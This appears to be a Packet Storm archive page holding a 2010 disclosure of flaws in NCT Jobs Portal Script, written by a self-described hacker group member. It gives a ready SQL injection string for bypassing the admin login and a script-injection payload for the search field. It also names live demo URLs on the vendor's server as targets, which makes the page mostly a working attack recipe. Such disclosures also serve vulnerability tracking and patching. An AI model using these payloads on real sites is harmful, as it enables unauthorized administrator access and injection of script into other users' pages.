exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NCT Jobs Portal Script SQL Injection / Cross Site Scripting

NCT Jobs Portal Script SQL Injection / Cross Site Scripting
Posted Apr 24, 2010
Authored by Sid3 effects

NCT Jobs Portal Script suffers from a cross site scripting vulnerability. It also suffers from a remote SQL injection vulnerability that allows for authentication bypass.

tags | exploit, remote, xss, sql injection
SHA-256 | 7fe5d69d5bf05bfc2a622dbf3942699d7f0bf328bad2e885b70497323168bef3

NCT Jobs Portal Script SQL Injection / Cross Site Scripting

Change Mirror Download
# Exploit Title: XSS and Authentication bypass in NCT Jobs Portal Script
# Date: 24-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : [] ______________________________________________________________________________
XSS and Authentication bypass in NCT Jobs Portal Script
Vendor:http://www.ncrypted.net/
___________________________Author:Sid3^effects_________________________________


Description :

NCT Jobs Portal script is a web product for running powerful and customized job portals. Be it a fresh site that you want to launch or be it for integration into your already existing website, NCT Jobs Portal is everything you need when it comes to job portal or business networking solution. Jobs Portal comes with a front-end and a back-end (Admin Panel). Admin Panel has a wide range of functions along with a CMS (Content Management System) which will easily enpower you to customize and manage your very own Jobs Portal.

script cost :$99
---------------------------------------------------------------------------
* Authentication bypass:

The following script has authentication bypass in the admin login

use ' or 1=1 or ''=' in both login and password.

DEMO :http://clients.ncrypted.net/NCTJobs/admin/login.php
---------------------------------------------------------------------------
* XSS (cross site scripting ) :

XSS is also found in the search field.

Parameter Name: Keywords or Tags or Desired City
Parameter Type: Querystring
Attack Pattern: '"--><script>alert(0x000872)</script>
DEMO:http://clients.ncrypted.net/NCTJobs/
---------------------------------------------------------------------------

ShoutZ :
-------
---Indian Cyber warriors--Andhra hackers--

Greetz :
--------
---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close